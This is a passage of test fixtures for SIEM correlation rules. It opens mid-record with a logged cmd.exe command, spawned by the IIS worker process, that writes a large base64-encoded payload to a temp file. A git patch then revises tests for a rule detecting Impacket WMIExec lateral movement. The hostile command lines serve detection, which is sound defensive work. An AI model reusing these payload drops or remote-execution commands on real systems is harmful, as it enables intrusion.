AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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>>%TEMP%\\RsJnf.b64", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.id": "2276", "object.process.name": "cmd.exe", "object.process.parent.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "object.process.parent.id": "10384", "object.process.parent.name": "w3wp.exe", "object.process.parent.path": "c:\\windows\\system32\\inetsrv\\", "object.process.path": "c:\\windows\\system32\\", "src.host": "nbnaxypfekbxe", "src.hostname": "nbnaxypfekbxe", "src.ip": "10.155.1.6", "src.port": 45248, "status": "success", "subject": "account", "subject.account.domain": "example", "subject.account.id": "S-1-5-21-1999687082-732736654-454791560-1114", "subject.account.name": "k_ivanov", "subject.account.privileges": "local user rights", "subject.account.session_id": "883686380"} From 1b9ab9c056b66b8e21734b0c927ea5c25ac71125 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 11:29:44 +0300 Subject: [PATCH 38/57] =?UTF-8?q?=D0=A3=D0=B4=D0=B0=D0=BB=D0=B5=D0=BD?= =?UTF-8?q?=D1=8B=20=D0=BF=D0=BE=D0=B2=D1=82=D0=BE=D1=80=D1=8F=D1=8E=D1=89?= =?UTF-8?q?=D0=B8=D0=B5=D1=81=D1=8F=20=D1=82=D0=B5=D1=81=D1=82=D1=8B,=20?= =?UTF-8?q?=D1=80=D0=B0=D1=81=D1=88=D0=B8=D1=80=D0=B8=D0=BB=20=D0=BF=D0=BE?= =?UTF-8?q?=D0=BB=D1=8F=20=D0=B4=D0=B0=D0=BD=D0=BD=D1=8B=D1=85=20=D0=BA?= =?UTF-8?q?=D0=BE=D1=82=D0=BE=D1=80=D1=8B=D0=B5=20=D0=BC=D1=8B=20=D0=BE?= =?UTF-8?q?=D0=B6=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20=D0=B4=D0=BB=D1=8F=20?= =?UTF-8?q?=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Impacket=5FWMIExe?= =?UTF-8?q?c=5FCommand=5FExecuted)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Impacket_WMIExec_Command_Executed/tests/test_1.sc | 2 +- .../Impacket_WMIExec_Command_Executed/tests/test_2.sc | 4 ++-- .../Impacket_WMIExec_Command_Executed/tests/test_3.sc | 3 --- .../Impacket_WMIExec_Command_Executed/tests/test_4.sc | 4 ---- .../Impacket_WMIExec_Command_Executed/tests/test_5.sc | 3 --- .../Impacket_WMIExec_Command_Executed/tests/test_6.sc | 3 --- 6 files changed, 3 insertions(+), 16 deletions(-) delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_3.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_4.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_5.sc delete mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_6.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_1.sc index 1b7e7432..43e58648 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_1.sc @@ -1,3 +1,3 @@ {"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-30T20:32:51.1685890Z\"},\"EventRecordID\":\"9826\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1964\",\"ThreadID\":\"1664\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-30 20:32:51.168\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-b0f3-5cc8-0000-00105f321d00}\"},{\"Name\":\"ProcessId\",\"text\":\"3840\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7601.17514 (win7sp1_rtm.101119-1850)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"cmd.exe /Q /c cd \\\\ 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__1556656369.7 2>&1\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-b0f2-5cc8-0000-00203d311d00}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d313d\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-b0c0-5cc8-0000-001017c31c00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"836\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-b0f2-5cc8-0000-00203d311d00", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1913149", "object.process.cmdline": "cmd.exe /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1", "object.process.cwd": "C:\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "365abb72-b0f3-5cc8-0000-00105f321d00", "object.process.hash.imphash": "CEEFB55F764020CC5C5F8F23349AB163", "object.process.hash.md5": "AD7B9C14083B52BC532FBA5948342B98", "object.process.hash.sha1": "EE8CBF12D87C4D388F09B4F69BED2E91682920B5", "object.process.hash.sha256": "17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE", "object.process.id": "3840", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "object.process.parent.fullpath": "c:\\windows\\system32\\wbem\\wmiprvse.exe", "object.process.parent.guid": "365abb72-b0c0-5cc8-0000-001017c31c00", "object.process.parent.id": "836", "object.process.parent.name": "wmiprvse.exe", "object.process.parent.path": "c:\\windows\\system32\\wbem\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T08:42:34.485Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1913149", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-30T20:32:51.168Z", "type": "raw", "uuid": "4d37a299-56f3-4a2b-8d40-da1fcccbc1ad"} -expect 1 {"correlation_name": "Impacket_WMIExec_Command_Executed", "datafield1": "cd \\"} +expect 1 {"action": "execute", "alert.context": "Executed command: cd \\ via WMIExec", "category.generic": "Attack", "category.high": "Lateral Movement", "category.low": "Remote Services: Distributed Component Object Model", "correlation_name": "Impacket_WMIExec_Command_Executed", "correlation_type": "incident", "datafield1": "cd \\", "event_src.category": "Other", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Impacket_WMIExec_Command_Executed|iewin7|cmd.exe /q /c cd \\ 1> \\\\127.0.0.1\\admin$\\__1556656369.7 2>&1", "incident.aggregation.timeout": 600, "incident.category": "Undefined", "incident.severity": "high", "object": "command", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1913149", "object.process.cmdline": "cmd.exe /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1", "object.process.cwd": "C:\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "365abb72-b0f3-5cc8-0000-00105f321d00", "object.process.hash.md5": "AD7B9C14083B52BC532FBA5948342B98", "object.process.hash.sha1": "EE8CBF12D87C4D388F09B4F69BED2E91682920B5", "object.process.hash.sha256": "17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE", "object.process.id": "3840", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "object.process.parent.fullpath": "c:\\windows\\system32\\wbem\\wmiprvse.exe", "object.process.parent.id": "836", "object.process.parent.name": "wmiprvse.exe", "object.process.parent.path": "c:\\windows\\system32\\wbem\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1913149"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_2.sc index 12d14c6e..72025228 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_2.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_2.sc @@ -1,3 +1,3 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-30T20:32:51.2467140Z\"},\"EventRecordID\":\"9827\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1964\",\"ThreadID\":\"1664\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-30 20:32:51.246\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-b0f3-5cc8-0000-0010b1361d00}\"},{\"Name\":\"ProcessId\",\"text\":\"2504\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7601.17514 (win7sp1_rtm.101119-1850)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"cmd.exe /Q /c cd 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__1556656369.7 2>&1\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-b0f2-5cc8-0000-00203d311d00}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d313d\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-b0c0-5cc8-0000-001017c31c00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"836\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-b0f2-5cc8-0000-00203d311d00", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1913149", "object.process.cmdline": "cmd.exe /Q /c cd 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1", "object.process.cwd": "C:\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "365abb72-b0f3-5cc8-0000-0010b1361d00", "object.process.hash.imphash": "CEEFB55F764020CC5C5F8F23349AB163", "object.process.hash.md5": "AD7B9C14083B52BC532FBA5948342B98", "object.process.hash.sha1": "EE8CBF12D87C4D388F09B4F69BED2E91682920B5", "object.process.hash.sha256": "17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE", "object.process.id": "2504", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "object.process.parent.fullpath": "c:\\windows\\system32\\wbem\\wmiprvse.exe", "object.process.parent.guid": "365abb72-b0c0-5cc8-0000-001017c31c00", "object.process.parent.id": "836", "object.process.parent.name": "wmiprvse.exe", "object.process.parent.path": "c:\\windows\\system32\\wbem\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T08:42:34.486Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1913149", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-30T20:32:51.246Z", "type": "raw", "uuid": "f57f1602-2465-478e-888f-03081c0e33cb"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-30T20:32:51.3248390Z\"},\"EventRecordID\":\"9828\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1964\",\"ThreadID\":\"1664\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-30 